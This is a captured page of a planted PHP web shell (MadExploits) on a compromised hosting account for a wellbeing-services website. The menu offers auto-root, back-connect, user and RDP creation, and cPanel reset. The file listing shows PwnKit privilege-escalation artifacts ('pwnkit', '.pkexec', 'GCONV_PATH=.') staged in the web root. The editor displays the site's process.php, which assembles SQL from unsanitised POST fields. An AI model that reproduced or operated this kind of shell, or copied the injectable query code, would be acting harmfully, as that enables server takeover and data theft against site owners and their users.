Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.129.24.240
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
auswellbeing /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auswellbeing
[ DIR ]
drwxr-xr-x
config.ini
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
old
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
about.php
3.54
KB
-rw-r--r--
adjustment_support.php
48
B
-rw-r--r--
blog.php
2.65
KB
-rw-r--r--
check.php
718
B
-rw-r--r--
counselling_for_carers.php
48
B
-rw-r--r--
create.php
7.88
KB
-rw-r--r--
delete.php
1.42
KB
-rw-r--r--
front.check.login.php
740
B
-rw-r--r--
index.php
9.44
KB
-rw-r--r--
mindfulness_practice.php
48
B
-rw-r--r--
multilingual.php
48
B
-rw-r--r--
personal_development.php
48
B
-rw-r--r--
post.php
3.53
KB
-rw-r--r--
process.php
3.47
KB
-rw-r--r--
process_new.php
3.14
KB
-rw-r--r--
process_seo.php
1
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
relationship_skills.php
48
B
-rw-r--r--
service-data-template.php
2.57
KB
-rw-r--r--
service-data.php
1.45
KB
-rw-r--r--
services.php
3.47
KB
-rw-r--r--
update.php
10.89
KB
-rw-r--r--
upload.image.php
540
B
-rw-r--r--
upload.image.sm.php
561
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : process.php
<?php require_once "config.ini/login.check.php"; require_once('config.ini/base.functions.php'); if($_SERVER['REQUEST_METHOD'] == "POST") { $tbl = $_POST['tb']; $ref = $_POST['ref']; $type = $_POST['type']; $id = $_POST['id']; switch ($type) { case 'slider': $heading = addslashes($_POST['heading']); $path = $_POST['path']; $content = 'path = "'.$path.'", heading = "'.$heading.'"'; if(updateContent($db, $tbl, $id, $content)) { $success = true; } else { $success = false; } break; case 'title': $title = addslashes($_POST['title']); $content = 'page_content = "'.$title.'"'; if(updateContent($db, $tbl, $id, $content)) { $success = true; } else { $success = false; } break; case 'content': $content = addslashes($_POST['content']); $contentArray = 'page_content = "'.$content.'"'; if(updateContent($db, $tbl, $id, $contentArray)) { $success = true; } else { $success = false; } break; case 'photo': $content = addslashes($_POST['path']); $contentArray = 'page_content = "'.$content.'"'; if(updateContent($db, $tbl, $id, $contentArray)) { $success = true; } else { $success = false; } break; case 'blog': $heading = $_POST['heading']; $photo = $_POST['path']; $post_short_summery = addslashes($_POST['post_short_summery']); $post_long_summery = addslashes($_POST['post_long_summery']); $title = addslashes($_POST['title']); $description = addslashes($_POST['description']); $keywords = addslashes($_POST['keywords']); $contentArray ='post_title = "'.$heading.'",post_img = "'. $photo .'",post_short_summery = "'. $post_short_summery .'",post_long_summery = "'. $post_long_summery .'",title = "'. $title .'",description = "'. $description .'",keywords = "'. $keywords .'"'; if(updateContent($db, $tbl, $id, $contentArray)) { $success = true; } else { $success = false; } break; case 'services': $heading = $_POST['heading']; $photo_sm = $_POST['path_sm']; $photo_lg = $_POST['path']; $service_page_name = $_POST['service_page_name']; $content = addslashes($_POST['content']); $title = addslashes($_POST['title']); $description = addslashes($_POST['description']); $keywords = addslashes($_POST['keywords']); $contentArray = 'service_heading = "'.$heading.'", service_sm_img = "'. $photo_sm .'", service_lg_img = "'. $photo_lg .'", service_content = "'. $content .'", title = "'. $title .'", description = "'. $description .'", keywords = "'. $keywords .'"'; if(updateContent($db, $tbl, $id, $contentArray)) { $success = true; } else { $success = false; } break; default: // code... break; } if($success == true) { $return = baseurl; if ($ref == 'home' & !isset($service_page_name)) { header("Location: $return/index.php"); } else if ($ref == 'home' & isset($service_page_name)) { header("Location: $service_page_name.php"); } else { header("Location: $ref.php"); } } } else { ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>404 - File Not Found</title> </head> <body> <h1>404 - File Not Found</h1> <p>Go Back to <a href="index.php">Home</a></p> </body> </html> <?php }?>
Close